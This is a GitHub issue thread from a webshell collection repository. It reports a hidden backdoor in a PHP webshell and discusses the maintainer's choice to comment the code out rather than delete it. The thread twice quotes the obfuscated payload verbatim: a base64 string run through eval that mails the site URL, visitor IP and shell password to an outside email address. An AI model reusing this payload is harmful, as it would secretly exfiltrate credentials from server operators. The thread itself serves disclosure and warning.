Hidden Backdoor

Question

Hidden Backdoor

dev0root opened this issue 6 years ago · 12 comments

in Line 75 you can see this code
$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff)); when i decode it i see mail() function to send (path ,password ,visitor ip) to this email okyazu@gmail.com @mail("okyazu@gmail.com",$judul,$body,$auth_pass);

port9org commented 6 years ago

👍

Answer 1 · 2018-08-24T08:46:11.000Z

what the webshell ？？ url or name ,i del backdoor

Answer 2 · 2018-08-24T11:12:19.000Z

Same with this issue

#20

Answer 3 · 2018-08-24T11:15:58.000Z

Found.

https://github.com/tennc/webshell/blob/master/php/404.php.txt

Answer 4 · 2018-08-27T02:21:00.000Z

https://github.com/tennc/webshell/blob/master/php/404.php.txt ？？？

Answer 5 · 2018-08-27T04:36:42.000Z

@tennc yep, look at line 75-76.

$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";  
eval(base64_decode($wsobuff));

Answer 6 · 2018-08-27T04:59:30.000Z

@aancw thank you， i use

/*   */

commented out backdoor codes

Answer 7 · 2018-08-27T05:01:56.000Z

Why don't you just delete that code?

Answer 8 · 2018-08-29T07:53:31.000Z

@aancw easy to query later for everybody

Answer 9 · 2018-08-29T07:56:38.000Z

Ah i see, i think you can close this issue.

Answer 10 · 2018-08-29T08:01:23.000Z

yes :） 👍

Answer 11 · 2018-09-11T04:05:36.000Z

Infact a pretty big deal I would say, just toticed the thread was closed so I had to look into closed threads and there I see most threads are regarding hidden back doors. Are theese webshells collected or maintained, seems only logical to assume they all have backdoors except those already detected. That being said, not everyone has time and effort to keep up with maintenance of their repos though but agreed on the removal, definatelty important to do and commit unless the repository owner has an advantage of the back doors being there? If your dealing with back door webshells I guess you must expect being attempted backdoored all over the place - these scripts are in most cases very dangerous to even play with if not having extremely good oversight! Mvh, Kim Steinhaug mailto:kim@steinhaug.com

…

----- Opprinnelig melding fra tirsdag 11. september 2018 -----

@aancwMore than likely so it can be easily uncommented again at a later date without as much scrutiny - whereas if it had been deleted, re-adding such a large code-block later would raise some flags and cause people to look at the code more closely. The excuse of "easy to query later for everybody" doesn't make sense, as git keeps history, so anyone could easily query the git commit prior to the removal if they want to see the code. — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or mute the thread. {"api_version":"1.0","publisher":{"api_key":"05dde50f1d1a384dd78767c55493e4bb","name":"GitHub"},"entity":{"external_key":"github/tennc/webshell","title":"tennc/webshell","subtitle":"GitHub repository","main_image_url":"https://assets-cdn.github.com/images/email/message_cards/header.png","avatar_image_url":"https://assets-cdn.github.com/images/email/message_cards/avatar.png","action":{"name":"Open in ***@***.*** in #27: @aancw More than likely so it can be easily uncommented again at a later date without as much scrutiny - whereas if it had been deleted, re-adding such a large code-block later would raise some flags and cause people to look at the code more closely.\r\n\r\nThe excuse of \"easy to query later for everybody\" doesn't make sense, as git keeps history, so anyone could easily query the git commit prior to the removal if they want to see the code."}],"action":{"name":"View Issue","url":"#27 (comment)"}}}[ { ***@***.***": "http://schema.org", ***@***.***": "EmailMessage", "potentialAction": { ***@***.***": "ViewAction", "target": "#27 (comment)", "url": "#27 (comment)", "name": "View Issue" }, "description": "View this Issue on GitHub", "publisher": { ***@***.***": "Organization", "name": "GitHub", "url": "https://github.com" } }, { ***@***.***": "MessageCard", ***@***.***": "http://schema.org/extensions", "hideOriginalBody": "false", "originator": "AF6C5A86-E920-430C-9C59-A73278B5EFEB", "title": "Re: [tennc/webshell] Hidden Backdoor (#27)", "sections": [ { "text": "", "activityTitle": "**Steve Divskinsy**", "activityImage": "https://assets-cdn.github.com/images/email/message_cards/avatar.png", "activitySubtitle": ***@***.***", "facts": [ ] } ], "potentialAction": [ { "name": "Add a comment", ***@***.***": "ActionCard", "inputs": [ { "isMultiLine": true, ***@***.***": "TextInput", "id": "IssueComment", "isRequired": false } ], "actions": [ { "name": "Comment", ***@***.***": "HttpPOST", "target": "https://api.github.com", "body": "{\n\"commandName\": \"IssueComment\",\n\"repositoryFullName\": \"tennc/webshell\",\n\"issueId\": 27,\n\"IssueComment\": \"{{IssueComment.value}}\"\n}" } ] }, { "targets": [ { "os": "default", "uri": "#27 (comment)" } ], ***@***.***": "OpenUri", "name": "View on GitHub" }, { "name": "Unsubscribe", ***@***.***": "HttpPOST", "target": "https://api.github.com", "body": "{\n\"commandName\": \"MuteNotification\",\n\"threadId\": 371649711\n}" } ], "themeColor": "26292E" } ]